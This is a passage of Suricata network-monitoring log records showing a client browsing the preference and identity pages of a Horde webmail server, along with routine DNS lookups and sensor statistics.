flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} {"timestamp":"2020-02-29T00:25:05.000558+0000","flow_id":811820461074107,"event_type":"flow","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:04.468667+0000","end":"2020-02-29T00:20:04.579983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:06.898313+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36277,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39043,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:06.930810+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":16}} {"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:07.094400+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356}} {"timestamp":"2020-02-29T00:25:07.160564+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":17}} {"timestamp":"2020-02-29T00:25:07.164197+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:25:07.179831+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":18}} {"timestamp":"2020-02-29T00:25:07.221307+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":19,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} {"timestamp":"2020-02-29T00:25:10.000204+0000","event_type":"stats","stats":{"uptime":15162,"capture":{"kernel_packets":140833,"kernel_drops":0},"decoder":{"pkts":140850,"bytes":96657728,"invalid":195,"ipv4":139263,"ipv6":10,"ethernet":140850,"raw":0,"null":0,"sll":0,"tcp":133697,"udp":5356,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":353,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1218,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2449,"failed_udp":116},"tx":{"http":4961,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2533}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2531,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} {"timestamp":"2020-02-29T00:25:12.185232+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":19}} {"timestamp":"2020-02-29T00:25:12.486392+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59784,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:12.665144+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.676492+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:25:12.880834+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.882591+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:25:15.000420+0000","flow_id":2114307948884849,"event_type":"flow","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:13.602993+0000","end":"2020-02-29T00:20:13.714116+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.000335+0000","event_type":"stats","stats":{"uptime":15169,"capture":{"kernel_packets":141313,"kernel_drops":0},"decoder":{"pkts":141412,"bytes":97133781,"invalid":195,"ipv4":139825,"ipv6":10,"ethernet":141412,"raw":0,"null":0,"sll":0,"tcp":134257,"udp":5358,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2903,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2919,"synack":2910,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1911,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2450,"failed_udp":116},"tx":{"http":4963,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2534}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2532,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35665,"memcap":0}}} {"timestamp":"2020-02-29T00:25:17.000998+0000","flow_id":80645229386881,"event_type":"flow","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:16.662657+0000","end":"2020-02-29T00:20:16.774063+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.887686+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:25:19.023428+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50951,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:19.213257+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425}} {"timestamp":"2020-02-29T00:25:21.496587+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:25:21.508513+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:21.742083+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:25:21.795448+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:25:21.799324+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:25:21.802311+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:25:21.802660+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:25:21.834936+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":3}} {"timestamp":"2020-02-29T00:25:21.835707+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:25:21.833550+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:25:21.877288+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:25:21.887524+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":4}} {"timestamp":"2020-02-29T00:25:21.888085+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:25:22.002635+0000","flow_id":412190935165934,"event_type":"flow","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:21.601070+0000","end":"2020-02-29T00:20:21.712317+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:24.000418+0000","event_type":"stats","stats":{"uptime":15176,"capture":{"kernel_packets":141522,"kernel_drops":0},"decoder":{"pkts":141561,"bytes":97241089,"invalid":195,"ipv4":139974,"ipv6":10,"ethernet":141561,"raw":0,"null":0,"sll":0,"tcp":134402,"udp":5362,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2452,"failed_udp":116},"tx":{"http":4971,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2536}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2534,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":105136,"memcap":0}}} {"timestamp":"2020-02-29T00:25:24.162555+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56920,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:24.190806+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 